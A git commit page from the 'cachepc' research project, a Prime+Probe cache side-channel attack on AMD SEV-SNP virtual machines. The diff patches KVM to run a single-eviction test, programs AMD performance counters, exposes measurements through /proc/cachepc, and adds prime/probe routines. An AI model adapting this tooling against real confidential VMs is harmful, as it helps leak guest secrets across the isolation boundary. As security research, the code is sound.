cachepc

Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
git clone https://git.sinitax.com/sinitax/cachepc
Log | Files | Refs | Submodules | README | sfeed.txt

commit 8dc6462e70009c0bbcf0bbfcfd2d4494d3772580
parent 2558cb66b59aae1578fc46ff8edf5d7cf9383037
Author: Louis Burda <quent.burda@gmail.com>
Date:   Tue, 26 Jul 2022 17:16:10 +0200

Single eviction test with sleep

Diffstat:
M.gitignore | 1+
MMakefile | 9+++++++++
Mpatch.diff | 80++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++-------------
Aread.c | 31+++++++++++++++++++++++++++++++
Msrc/asm.h | 46++++++++++++++++++++++++++++++++++------------
Msrc/cachepc.c | 170+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++--------
Msrc/cachepc.h | 137+++++++++++++++++++++++++++++++++++++++++++++----------------------------------
7 files changed, 374 insertions(+), 100 deletions(-)

diff --git a/.gitignore b/.gitignore @@ -2,3 +2,4 @@ build.sh push.sh *.o.cmd *.o +read diff --git a/Makefile b/Makefile @@ -26,3 +26,12 @@ load: sudo rmmod kvm || true sudo insmod $(KERNEL_SOURCE)/arch/x86/kvm/kvm.ko sudo insmod $(KERNEL_SOURCE)/arch/x86/kvm/kvm-amd.ko + +read: read.c + $(CC) -o $@ $< + +test: load read + @./read + +update: + git -C $(KERNEL_SOURCE) diff > patch.diff diff --git a/patch.diff b/patch.diff @@ -81,7 +81,7 @@ index 7b3cfbe8f7e3..71697d08e9e4 100644 } diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c -index 2541a17ff1c4..c219a214d904 100644 +index 2541a17ff1c4..757128b13fe5 100644 --- a/virt/kvm/kvm_main.c +++ b/virt/kvm/kvm_main.c @@ -51,6 +51,9 @@ @@ -103,21 +103,26 @@ index 2541a17ff1c4..c219a214d904 100644 MODULE_AUTHOR("Qumranet"); MODULE_LICENSE("GPL"); -@@ -143,6 +148,13 @@ static void hardware_disable_all(void); +@@ -143,6 +148,18 @@ static void hardware_disable_all(void); static void kvm_io_bus_destroy(struct kvm_io_bus *bus); -+uint8_t *cachepc_msrmts; -+size_t cachepc_msrmts_count; +struct proc_ops cachepc_proc_ops; + ++uint16_t *cachepc_msrmts; ++size_t cachepc_msrmts_count; +EXPORT_SYMBOL(cachepc_msrmts); +EXPORT_SYMBOL(cachepc_msrmts_count); + ++cache_ctx *cachepc_ctx; ++cacheline *cachepc_ds; ++EXPORT_SYMBOL(cachepc_ctx); ++EXPORT_SYMBOL(cachepc_ds); ++ __visible bool kvm_rebooting; EXPORT_SYMBOL_GPL(kvm_rebooting); -@@ -4765,6 +4777,50 @@ static void check_processor_compat(void *data) +@@ -4765,12 +4782,94 @@ static void check_processor_compat(void *data) *c->ret = kvm_arch_check_processor_compat(c->opaque); } @@ -141,14 +146,16 @@ index 2541a17ff1c4..c219a214d904 100644 +kvm_cachepc_read(struct file *file, char *buf, size_t buflen, loff_t *off) +{ + size_t len, left; ++ size_t size; + + printk(KERN_WARNING "CacheSC: Reading entries (%lu:%lli)\n", + buflen, off ? *off : 0); + -+ if (!off || *off >= cachepc_msrmts_count || *off < 0) ++ size = cachepc_msrmts_count * sizeof(uint16_t); ++ if (!off || *off >= size || *off < 0) + return 0; + -+ len = cachepc_msrmts_count - *off; ++ len = size - *off; + if (len > buflen) len = buflen; + + left = copy_to_user(buf, cachepc_msrmts + *off, len); @@ -165,37 +172,84 @@ index 2541a17ff1c4..c219a214d904 100644 + return 0; +} + ++void ++kvm_cachepc_single_eviction_test(void *p) ++{ ++ cacheline *head; ++ cacheline *ptr; ++ ++ ptr = cachepc_prepare_victim(cachepc_ctx, 5); ++ head = cachepc_prime(cachepc_ds); ++ cachepc_victim(ptr); ++ cachepc_probe(head); ++ ++ printk(KERN_WARNING "CachePC: Test done, results:"); ++ cachepc_print_msrmts(head); ++ cachepc_save_msrmts(head); ++ ++ cachepc_release_victim(cachepc_ctx, ptr); ++} ++ ++void ++kvm_cachepc_init(void *p) ++{ ++ int cpu; ++ ++ cpu = get_cpu(); ++ ++ printk(KERN_WARNING "CachePC: Running on core %i\n", cpu); ++ ++ cachepc_init_counters(); ++ ++ cachepc_ctx = cachepc_get_ctx(L1); ++ cachepc_ds = cachepc_prepare_ds(cachepc_ctx); ++ ++ kvm_cachepc_single_eviction_test(p); ++ ++ put_cpu(); ++} ++ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align, struct module *module) { -@@ -4848,6 +4904,20 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align, + struct kvm_cpu_compat_check c; +- int r; +- int cpu; ++ int r, cpu; + + r = kvm_arch_init(opaque); + if (r) +@@ -4848,6 +4947,20 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align, r = kvm_vfio_ops_init(); WARN_ON(r); -+ cachepc_init_counters(); -+ + cachepc_msrmts_count = L1_SETS; -+ cachepc_msrmts = kzalloc(cachepc_msrmts_count, GFP_KERNEL); ++ cachepc_msrmts = kzalloc(cachepc_msrmts_count * sizeof(uint16_t), GFP_KERNEL); + BUG_ON(cachepc_msrmts == NULL); + ++ r = smp_call_function_single(2, kvm_cachepc_init, NULL, true); ++ WARN_ON(r != 0); ++ + memset(&cachepc_proc_ops, 0, sizeof(cachepc_proc_ops)); + cachepc_proc_ops.proc_open = kvm_cachepc_open; + cachepc_proc_ops.proc_read = kvm_cachepc_read; + cachepc_proc_ops.proc_write = kvm_cachepc_write; + cachepc_proc_ops.proc_release = kvm_cachepc_close; -+ + proc_create("cachepc", 0644, NULL, &cachepc_proc_ops); + return 0; out_unreg: -@@ -4872,6 +4942,9 @@ EXPORT_SYMBOL_GPL(kvm_init); +@@ -4872,6 +4985,12 @@ EXPORT_SYMBOL_GPL(kvm_init); void kvm_exit(void) { + remove_proc_entry("cachepc", NULL); + kfree(cachepc_msrmts); + ++ cachepc_release_ds(cachepc_ctx, cachepc_ds); ++ cachepc_release_ctx(cachepc_ctx); ++ debugfs_remove_recursive(kvm_debugfs_dir); misc_deregister(&kvm_dev); kmem_cache_destroy(kvm_vcpu_cache); diff --git a/read.c b/read.c @@ -0,0 +1,31 @@ +#include <stdlib.h> +#include <stdio.h> +#include <fcntl.h> +#include <stdint.h> +#include <assert.h> +#include <unistd.h> + +int +main(int argc, const char **argv) +{ + uint16_t counts[64]; + size_t i, len; + int fd; + + fd = open("/proc/cachepc", O_RDONLY); + len = read(fd, counts, sizeof(counts)); + assert(len == sizeof(counts)); + + for (i = 0; i < 64; i++) { + if (i % 16 == 0 && i) + printf("\n"); + if (counts[i] > 0) + printf("\x1b[91m"); + printf("%2i ", i); + if (counts[i] > 0) + printf("\x1b[0m"); + } + printf("\n"); + + close(fd); +} diff --git a/src/asm.h b/src/asm.h @@ -19,6 +19,12 @@ static inline void cachepc_sfence(void); __attribute__((always_inline)) static inline void cachepc_mfence(void); +__attribute__((always_inline)) +static inline void cachepc_readq(void *p); + +__attribute__((always_inline)) +static inline void cachepc_victim(void *p); + uint64_t cachepc_readpmc(uint64_t event) { @@ -46,26 +52,42 @@ cachepc_cpuid(void) void cachepc_lfence(void) { - asm volatile( - "lfence\n\t" - :: - ); + asm volatile( + "lfence\n\t" + :: + ); } void cachepc_sfence(void) { - asm volatile( - "sfence\n\t" - :: - ); + asm volatile( + "sfence\n\t" + :: + ); } void cachepc_mfence(void) { - asm volatile( - "mfence\n\t" - :: - ); + asm volatile( + "mfence\n\t" + :: + ); +} + +void +cachepc_readq(void *p) +{ + asm volatile ( + "movq (%0), %%r10\n\t" + : : "r" (p) : "r10" + ); +} + +void +cachepc_victim(void *p) +{ + cachepc_mfence(); + cachepc_readq(p); } diff --git a/src/cachepc.c b/src/cachepc.c @@ -1,5 +1,10 @@ #include "cachepc.h" +static void cl_insert(cacheline *last_cl, cacheline *new_cl); +static void *remove_cache_set(cache_ctx *ctx, void *ptr); +static void *remove_cache_group_set(void *ptr); + +static cacheline *prepare_cache_set_ds(cache_ctx *ctx, uint32_t *set, uint32_t sets_len); static cacheline *build_cache_ds(cache_ctx *ctx, cacheline **cacheline_ptr_arr); static void build_randomized_list_for_cache_set(cache_ctx *ctx, cacheline **cacheline_ptr_arr); static cacheline **allocate_cache_ds(cache_ctx *ctx); @@ -9,7 +14,7 @@ static void *aligned_alloc(size_t alignment, size_t size); void cachepc_init_counters(void) { - uint32_t event, event_no, event_mask; + uint64_t event, event_no, event_mask; uint64_t reg_addr; /* SEE: https://developer.amd.com/resources/developer-guides-manuals (PPR 17H 31H, P.166) @@ -20,22 +25,24 @@ cachepc_init_counters(void) * 6 slots total */ - reg_addr = 0xc0010200; /* first slot */ + reg_addr = 0xc0010200; event_no = 0x64; event_mask = 0x08; event = event_no | (event_mask << 8); - event |= (1<< 17); /* OsUserMode bit */ - event |= (1 << 22); /* enable performance counter */ - printk(KERN_WARNING "CachePC: Initialized event %d\n", event); + event |= (1ULL << 17); /* OS (kernel) events only */ + event |= (1ULL << 22); /* enable performance counter */ + event |= (1ULL << 40); /* Host events only */ + printk(KERN_WARNING "CachePC: Initialized event %llu\n", event); asm volatile ("wrmsr" : : "c"(reg_addr), "a"(event), "d"(0x00)); reg_addr = 0xc0010202; event_no = 0x64; - event_mask = 0xC8; + event_mask = 0xF0; event = event_no | (event_mask << 8); - event |= (1 << 17); /* OsUserMode bit */ - event |= (1 << 22); /* enable performance counter */ - printk(KERN_WARNING "CachePC: Initialized event %d\n", event); + event |= (1ULL << 17); /* OS (kernel) events only */ + event |= (1ULL << 22); /* enable performance counter */ + event |= (1ULL << 40); /* Host events only */ + printk(KERN_WARNING "CachePC: Initialized event %llu\n", event); asm volatile ("wrmsr" : : "c"(reg_addr), "a"(event), "d"(0x00)); } @@ -74,6 +81,13 @@ cachepc_get_ctx(cache_level cache_level) return ctx; } +void +cachepc_release_ctx(cache_ctx *ctx) +{ + kfree(ctx); +} + + /* * Initialises the complete cache data structure for the given context */ @@ -95,6 +109,42 @@ cachepc_prepare_ds(cache_ctx *ctx) } void +cachepc_release_ds(cache_ctx *ctx, cacheline *ds) +{ + kfree(remove_cache_set(ctx, ds)); +} + +cacheline * +cachepc_prepare_victim(cache_ctx *ctx, uint32_t set) +{ + cacheline *victim_set, *victim_cl; + cacheline *curr_cl, *next_cl; + + victim_set = prepare_cache_set_ds(ctx, &set, 1); + victim_cl = victim_set; + + // Free the other lines in the same set that are not used. + if (ctx->addressing == PHYSICAL) { + curr_cl = victim_cl->next; + do { + next_cl = curr_cl->next; + // Here, it is ok to free them directly, as every line in the same + // set is from a different page anyway. + kfree(remove_cache_group_set(curr_cl)); + curr_cl = next_cl; + } while(curr_cl != victim_cl); + } + + return victim_cl; +} + +void +cachepc_release_victim(cache_ctx *ctx, cacheline *victim) +{ + kfree(remove_cache_set(ctx, victim)); +} + +void cachepc_save_msrmts(cacheline *head) { cacheline *curr_cl; @@ -126,23 +176,109 @@ cachepc_print_msrmts(cacheline *head) } while (curr_cl != head); } + +cacheline * +prepare_cache_set_ds(cache_ctx *ctx, uint32_t *sets, uint32_t sets_len) +{ + cacheline *cache_ds, **first_cl_in_sets, **last_cl_in_sets; + cacheline *to_del_cls, *curr_cl, *next_cl, *cache_set_ds; + uint32_t i, cache_groups_len, cache_groups_max_len; + uint32_t *cache_groups; + + cache_ds = cachepc_prepare_ds(ctx); + + first_cl_in_sets = kzalloc(ctx->sets * sizeof(cacheline *), GFP_KERNEL); + BUG_ON(first_cl_in_sets == NULL); + + last_cl_in_sets = kzalloc(ctx->sets * sizeof(cacheline *), GFP_KERNEL); + BUG_ON(last_cl_in_sets == NULL); + + // Find the cache groups that are used, so that we can delete the other ones + // later (to avoid memory leaks) + cache_groups_max_len = ctx->sets / CACHE_GROUP_SIZE; + cache_groups = kmalloc(cache_groups_max_len * sizeof(uint32_t), GFP_KERNEL); + BUG_ON(cache_groups == NULL); + + cache_groups_len = 0; + for (i = 0; i < sets_len; ++i) { + if (!is_in_arr(sets[i] / CACHE_GROUP_SIZE, cache_groups, cache_groups_len)) { + cache_groups[cache_groups_len] = sets[i] / CACHE_GROUP_SIZE; + ++cache_groups_len; + } + } + + to_del_cls = NULL; + curr_cl = cache_ds; + + // Extract the partial data structure for the cache sets and ensure correct freeing + do { + next_cl = curr_cl->next; + + if (IS_FIRST(curr_cl->flags)) { + first_cl_in_sets[curr_cl->cache_set] = curr_cl; + } + if (IS_LAST(curr_cl->flags)) { + last_cl_in_sets[curr_cl->cache_set] = curr_cl; + } + + if (ctx->addressing == PHYSICAL && !is_in_arr( + curr_cl->cache_set / CACHE_GROUP_SIZE, cache_groups, cache_groups_len)) + { + // Already free all unused blocks of the cache ds for physical + // addressing, because we loose their refs + cl_insert(to_del_cls, curr_cl); + to_del_cls = curr_cl; + } + curr_cl = next_cl; + + } while(curr_cl != cache_ds); + + // Fix partial cache set ds + for (i = 0; i < sets_len; ++i) { + last_cl_in_sets[sets[i]]->next = first_cl_in_sets[sets[(i + 1) % sets_len]]; + first_cl_in_sets[sets[(i + 1) % sets_len]]->prev = last_cl_in_sets[sets[i]]; + } + cache_set_ds = first_cl_in_sets[sets[0]]; + + // Free unused cache lines + if (ctx->addressing == PHYSICAL) { + cachepc_release_ds(ctx, to_del_cls); + } + + kfree(first_cl_in_sets); + kfree(last_cl_in_sets); + kfree(cache_groups); + + return cache_set_ds; +} + +void +cl_insert(cacheline *last_cl, cacheline *new_cl) +{ + if (last_cl == NULL) { + // Adding the first entry is a special case + new_cl->next = new_cl; + new_cl->prev = new_cl; + } else { + new_cl->next = last_cl->next; + new_cl->prev = last_cl; + last_cl->next->prev = new_cl; + last_cl->next = new_cl; + } +} + void * remove_cache_set(cache_ctx *ctx, void *ptr) { return (void *) (((uintptr_t) ptr) & ~SET_MASK(ctx->sets)); } -void -cachepc_release_ds(cache_ctx *ctx, cacheline *ds) +void * +remove_cache_group_set(void *ptr) { - kfree(remove_cache_set(ctx, ds)); + return (void *) (((uintptr_t) ptr) & ~SET_MASK(CACHE_GROUP_SIZE)); } -void -cachepc_release_ctx(cache_ctx *ctx) -{ - kfree(ctx); -} /* * Create a randomized doubly linked list with the following structure: diff --git a/src/cachepc.h b/src/cachepc.h @@ -3,22 +3,28 @@ #include <linux/kernel.h> #include <linux/types.h> #include <linux/slab.h> +#include <linux/delay.h> #include "asm.h" #include "cache_types.h" #include "util.h" -#define L2_HIT_CNTR 0xC0010201 -#define L2_MISS_CNTR 0xC0010203 +#define L2_MISS_CNTR 0xC0010201 +#define L2_HIT_CNTR 0xC0010203 void cachepc_init_counters(void); cache_ctx *cachepc_get_ctx(cache_level cl); +void cachepc_release_ctx(cache_ctx *ctx); + cacheline *cachepc_prepare_ds(cache_ctx *ctx); +void cachepc_release_ds(cache_ctx *ctx, cacheline *ds); + +cacheline *cachepc_prepare_victim(cache_ctx *ctx, uint32_t set); +void cachepc_release_victim(cache_ctx *ctx, cacheline *ptr); + void cachepc_save_msrmts(cacheline *head); void cachepc_print_msrmts(cacheline *head); -void cachepc_release_ds(cache_ctx *ctx, cacheline *ds); -void cachepc_release_ctx(cache_ctx *ctx); __attribute__((always_inline)) static inline cacheline *cachepc_prime(cacheline *head); @@ -26,20 +32,23 @@ static inline cacheline *cachepc_prime(cacheline *head); __attribute__((always_inline)) static inline cacheline *cachepc_prime_rev(cacheline *head); -__attribute__((always_inline)) -static inline cacheline *cachepc_probe_set(cacheline *curr_cl); +//__attribute__((always_inline)) +//static inline cacheline *cachepc_probe_set(cacheline *curr_cl); __attribute__((always_inline)) static inline cacheline *cachepc_probe(cacheline *head); -extern uint8_t *cachepc_msrmts; +extern uint16_t *cachepc_msrmts; extern size_t cachepc_msrmts_count; +extern cache_ctx *cachepc_ctx; +extern cacheline *cachepc_ds; + /* * Prime phase: fill the target cache (encoded in the size of the data structure) * with the prepared data structure, i.e. with attacker data. */ -static inline cacheline * +cacheline * cachepc_prime(cacheline *head) { cacheline *curr_cl; @@ -73,7 +82,7 @@ cachepc_prime(cacheline *head) * A) An evicted set is L2_ACCESS_TIME - L1_ACCESS_TIME slower * B) An evicted set is L3_ACCESS_TIME - L2_ACCESS_TIME slower */ -static inline cacheline * +cacheline * cachepc_prime_rev(cacheline *head) { cacheline *curr_cl; @@ -89,61 +98,73 @@ cachepc_prime_rev(cacheline *head) return curr_cl->prev; } -static inline cacheline * -cachepc_probe_set(cacheline *curr_cl) +cacheline * +cachepc_probe(cacheline *start_cl) { uint64_t pre1, pre2; uint64_t post1, post2; cacheline *next_cl; + cacheline *curr_cl; - pre1 = cachepc_readpmc(L2_HIT_CNTR); - pre2 = cachepc_readpmc(L2_MISS_CNTR); - - cachepc_mfence(); - asm volatile( - "mov 8(%[curr_cl]), %%rax \n\t" // +8 - "mov 8(%%rax), %%rcx \n\t" // +16 - "mov 8(%%rcx), %%rax \n\t" // +24 - "mov 8(%%rax), %%rcx \n\t" // +32 - "mov 8(%%rcx), %%rax \n\t" // +40 - "mov 8(%%rax), %%rcx \n\t" // +48 - "mov 8(%%rcx), %[curr_cl_out] \n\t" // +56 - "mov 8(%[curr_cl_out]), %[next_cl_out] \n\t" // +64 - : [next_cl_out] "=r" (next_cl), - [curr_cl_out] "=r" (curr_cl) - : [curr_cl] "r" (curr_cl) - : "rax", "rcx" - ); - cachepc_mfence(); - cachepc_cpuid(); - - post1 = cachepc_readpmc(L2_HIT_CNTR); - cachepc_cpuid(); - post2 = cachepc_readpmc(L2_MISS_CNTR); - cachepc_cpuid(); - - /* works across size boundary */ - curr_cl->count = 0; - curr_cl->count += post1 - pre1; - curr_cl->count += post2 - pre2; - - return next_cl; -} + curr_cl = start_cl; -static inline cacheline * -cachepc_probe(cacheline *head) -{ - cacheline *curr_cs; - - //printk(KERN_WARNING "CachePC: Probing.."); - - curr_cs = head; do { - curr_cs = cachepc_probe_set(curr_cs); - } while (__builtin_expect(curr_cs != head, 1)); - - //printk(KERN_WARNING "CachePC: Probing done"); - - return curr_cs->next; + cachepc_cpuid(); + cachepc_mfence(); + + asm volatile( + "mov 8(%[curr_cl]), %%rax \n\t" // +8 + "mov 8(%%rax), %%rcx \n\t" // +16 + "mov 8(%%rcx), %%rax \n\t" // +24 + "mov 8(%%rax), %%rcx \n\t" // +32 + "mov 8(%%rcx), %%rax \n\t" // +40 + "mov 8(%%rax), %%rcx \n\t" // +48 + "mov 8(%%rcx), %[curr_cl_out] \n\t" // +56 + "mov 8(%[curr_cl_out]), %[next_cl_out] \n\t" // +64 + : [next_cl_out] "=r" (next_cl), + [curr_cl_out] "=r" (curr_cl) + : [curr_cl] "r" (curr_cl) + : "rax", "rcx" + ); + + cachepc_cpuid(); + cachepc_mfence(); + + pre1 = cachepc_readpmc(L2_HIT_CNTR); + pre2 = cachepc_readpmc(L2_MISS_CNTR); + + cachepc_cpuid(); + cachepc_mfence(); + + msleep(100); + + post1 = cachepc_readpmc(L2_HIT_CNTR); + cachepc_cpuid(); + post2 = cachepc_readpmc(L2_MISS_CNTR); + cachepc_cpuid(); + + /* works across size boundary */ + curr_cl->count = 0; + curr_cl->count += post1 - pre1; + curr_cl->count += post2 - pre2; + } while (__builtin_expect(curr_cl != start_cl, 1)); + + return curr_cl->next; } +// static inline cacheline * +// cachepc_probe(cacheline *head) +// { +// cacheline *curr_cs; +// +// //printk(KERN_WARNING "CachePC: Probing.."); +// +// curr_cs = head; +// do { +// curr_cs = cachepc_probe_set(curr_cs); +// } while (__builtin_expect(curr_cs != head, 1)); +// +// //printk(KERN_WARNING "CachePC: Probing done"); +// +// return curr_cs->next; +// }